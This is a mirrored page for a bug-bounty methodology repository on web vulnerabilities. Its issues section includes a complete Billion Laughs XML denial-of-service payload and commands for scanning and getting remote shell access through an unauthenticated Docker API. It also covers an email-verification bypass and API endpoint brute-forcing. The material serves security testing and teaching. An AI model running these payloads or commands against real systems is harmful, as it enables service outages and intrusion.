Giter Site home page Giter Site logo

kathanp19 / howtohunt Goto Github PK

View Code? Open in Web Editor NEW
5.6K 270.0 1.6K 3.23 MB

Collection of methodology and test case for various web vulnerabilities.

License: GNU General Public License v3.0

vulnerability tutorials bughunting-methodology bugbounty bugbountytips

howtohunt's Introduction

HowToHunt

All Contributors

Some Tutorials and Things to Do while Hunting Particular Vulnerability.

- Go to Above GitBook link if you want to read and To Contribute go to Github and and make a Pull Request !!.

Note: You can help me complete this list by making Pull Request and please do mention your twitter handler at the end of the file.

All the credits to all the contributors, without you all it could have never been possible

If you want to know what's added every week then follow me on twitter https://twitter.com/KathanP19 I post what's updated every weekends.

If You Want To Support Project Or Me You Can Buy Me A Coffee

Buy Me A Coffee

Contributors ✨

Thanks goes to these wonderful people :

Kathan Patel
Kathan Patel

Mehedi Hasan Remon
Mehedi Hasan Remon

Keshav Malik
Keshav Malik

Vivek Kumar Yadav
Vivek Kumar Yadav

Syed Mushfik Hasan Tahsin
Syed Mushfik Hasan Tahsin

Deepak Dhiman
Deepak Dhiman

maverickNerd
maverickNerd

Harsha Vardhan
Harsha Vardhan

Bishal Shrestha
Bishal Shrestha

Cyber-Pirate
Cyber-Pirate

Naman Shah
Naman Shah

ANUGRAH S R
ANUGRAH S R

Aishwarya Kendle
Aishwarya Kendle

MadMaxx
MadMaxx

Akshaykerkar
Akshaykerkar

Shadab Ansari
Shadab Ansari

CowlingBanana
CowlingBanana

Meet
Meet

Tushar
Tushar

Chintan Gurjar
Chintan Gurjar

praneeth1998
praneeth1998

sumitjat
sumitjat

Mr_p0tat0
Mr_p0tat0

ashhadali10
ashhadali10

Nav-Prak
Nav-Prak

NoBodysSafe
NoBodysSafe

Max Boll
Max Boll

Yash K
Yash K

febinrev
febinrev

fatinsourav
fatinsourav

iNoSec2
iNoSec2

Manas Harsh
Manas Harsh

0xsunil
0xsunil

Rakesh
Rakesh

Pratyaksh Singh
Pratyaksh Singh

Tamim Hasan
Tamim Hasan

Pratish58
Pratish58

Kalus
Kalus

Zero (Arif)
Zero (Arif)

Chirag Agrawal
Chirag Agrawal

Kushagra Sarathe
Kushagra Sarathe

RT
RT

Anishka Shukla
Anishka Shukla

Ikko Ashimine
Ikko Ashimine

Harshit Raj Singh
Harshit Raj Singh

Sm4rty-1
Sm4rty-1

dipakpanchal456
dipakpanchal456

Anubhav Singh
Anubhav Singh

Anupam Singh
Anupam Singh

Rishi Choudhary
Rishi Choudhary

Yasser Khan
Yasser Khan

yasser khan
yasser khan

Fani Malik Hack
Fani Malik Hack

dhruvin shah
dhruvin shah

TCode110
TCode110

Faizee Asad
Faizee Asad

Bikram kharal
Bikram kharal

c0ff33b34n
c0ff33b34n

Veshraj Ghimire
Veshraj Ghimire

TX
TX

Krishna Agarwal
Krishna Agarwal

z3dc0ps
z3dc0ps

Pugalarasan
Pugalarasan

Purujeet Singh
Purujeet Singh

Vedant
Vedant

Ome Mishra
Ome Mishra

Suprit Pandurangi
Suprit Pandurangi

Pugalarasan
Pugalarasan

Prince Prafull
Prince Prafull

offensive-droid
offensive-droid

Prakhar Porwal
Prakhar Porwal

Anmol K Sachan
Anmol K Sachan

This project follows the all-contributors specification. Contributions of any kind welcome!

howtohunt's People

Contributors

0xd3vil avatar 0xpugal avatar allcontributors[bot] avatar anishkashukla avatar anugrahsr avatar bala-praneeth avatar dotslashtx avatar fanimalikhack avatar febinrev avatar harsha-ambati avatar kathanp19 avatar klau5dev avatar mavericknerd avatar pratyaksh06 avatar pyr0sec avatar raiders0786 avatar rakesh0x7 avatar remonsec avatar rtcms avatar sandeepkrishnas avatar shadabansari avatar sm4rty-1 avatar smhtahsin33 avatar sumitjat avatar tamimhasan404 avatar theinfosecguy avatar v35hr4j avatar v3daxt avatar virdoexhunter avatar yashrk078 avatar

Stargazers

 avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar

Watchers

 avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar

howtohunt's Issues

Session Hijacking(Intended Behavior) - Please read the steps once. It looks different issue "Session not expired after logout"

In this book, here is the one topic which is related to Session Hijacking. As I observed this is another issue Session not expired after logout not a session hijacking

"Session Hijacking(Intended Behavior)
Steps:
1.Create your account
2.Login your account
3.Use cookie editor extension in browser
4.Copy all the target cookies
5.Logout your account
6.Paste that cookies in cookie editor extension
7.Refresh page if you are logged in than this is a session hijacking"

URl - https://github.com/KathanP19/HowToHunt/blob/master/Broken_Auth_And_Session_Management/Session_based_bugs.md

Please fix this in the book. Thanks

API Penetration Testing


Hidden API Functionality Exposure


Application programming interfaces (APIs) have become a critical part of almost every business. APIs are responsible for transferring information between systems within a company or to external companies. For example, when you log in to a website like Google or Facebook, an API processes your login credentials to verify they are correct.

Steps to Perform This Attack :

Step 1 : Capture the request into Burp, Send the request to repeater and intruder tab
Step 2 : Add the endpoint into the intruder tab and add the payload from the word-list
Step 3 : 1st use dictionary attack with sec-list on the Endpoint
Step 4 : Either use your customized list or use the ones which i have provided in the above section
Step 5 : Then simply start the attack, Start checking for 200 status
Step 7 : Once their is 200 status OK, Start the recursive scan on the same endpoint for juicy information like swagger doc and so on.
step 8 : Other method is to change the API version and try bruteforcing the same endpoint
Eg: Redacted.com/api/v1/{Endpoint} ----- Redacted.com/api/v2/{Endpoint}

Note: Their will be minimum limits per request which will be assigned without API keys so make sure to utilize manual approach as much as you can,Then the rest can be automated for scanning the vulnerability in API with automated tools

Email verification bypass via remember me functionality

Bug Description:
During sign up we need to verify the email but we can bypass the verification by just clicking the remember me button and changing the URL path.

Steps to reproduce:

1. Go to https://dashboard.example.com/signup and create a dummy account.
2. You will be asked to verify the account and the URL will be- https://dashboard.example.com/signup/pending/uri849hfjhd.
3. Now simply remove the /signup/pending/uri849hfjhd and make the URL- https://dashboard.example.com/
4. Now you will be redirected to https://dashboard.example.com/login
5. Enter the email/password that you used to create the account in step 1.
6. Click on 'remember me' button and click on Login.
7. Now you will again redirected to this path- https://dashboard.example.com/signup/pending/uri849hfjhd
8. Simply follow the above step 3[remove /signup... path in the URL and make it https://dashboard.example.com/] and you will be logged into the account without email verification.

Impact:
Email verification bypass could enable an attacker to do pre-account takeover and he can create any number of dummy accounts.

Recommendation:
Remember me functionality must verify whether the account is verified or not.

POC:
Please let me know how can I share the POC video privately because the bug is still not fixed on the application which I found on.

API Penetration Testing

Billion Laugh Attack


Another common vulnerability associated with XML parsing is called A Billion Laughs Attack. It uses an entity to resolve itself cyclically thereby consuming more CPU usage and causing a denial of service attack. An Example XML payload that can cause an XXE attack is as follows:

Step 1 : Capture the request into Burp
Step 2 : Send it to the repeater tab and then convert the body into XML whether it is accepting or not
Step 3 : To confirm, Check for the [ Accept ] Header change it into Application/json
Step 4 : Covert JSON into XML if their is no Possibility
Step 5 : Add the payload in between and change the content lol1 to lol9 depending on the dos variation in the xml field!

Billion Laugh Payload :

<?xml version="1.0"?>
<!DOCTYPE lolz [
 <!ENTITY lol "lol">
 <!ELEMENT lolz (#PCDATA)>
 <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
 <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
 <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
 <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
 <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
 <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
 <!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
 <!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
 <!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
]>
<lolz>&lol9;</lolz> 

Suggestion about hosting this project

I wanna suggest that this awesome project could be hosted with mdwiki, and then we'll get a readable web wiki page totally powered by the front end.
It's much easier and friendly to read or negavite.

Docker API unauthorized RCE

Docker API unauthorized RCE

Docker is an open-source platform for developers and other IT professionals to help build, ship, and run distributed applications.
the docker daemon (dockerd) provides an API service used for remote control of docker service the default daemon listen on Unix /var/run/docker.sock and when bound to a public interface can be used by an attacker to compromise container system due to lack of default authentication

Background concept:

  1. The host is running docker: daemon bound to the external interface with no access control or authentication
  2. Attacker uses docker API function to enumerate manage and control the container service the attacker is able to control existing deployed container or create another one.
  3. Docker API provides JSON response containing the output of command issued.

Enumerating docker API services
By default, the Docker host remote API listens on ports 2375 / 2376 and has no authentication. If the port is not blocked, docker host APIs can be accessed over the public internet.

nmap IP:2375/2376
nmap -p- IP
nmap -Pn -p 2375 IP
nmap -sV -p 2375 IP

To confirm that the docker is service is running on the target we can give the string in the browser and check the response
ex: https://IP:2375
we will receive a response something like this
{"message":"page not found"}
and to confirm the version details we can use this
https://IP:2375/version

The command used to exploit

This command is used to get all the information about the docker container
docker -H IP:2375 info

List all the running containers
docker -H IP:2375 ps

List all the stopped containers
docker -H IP:2375 ps -a

RCE for Docker
command for RCE
docker -H IP:2375 exec -it container_name /bin/bash

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.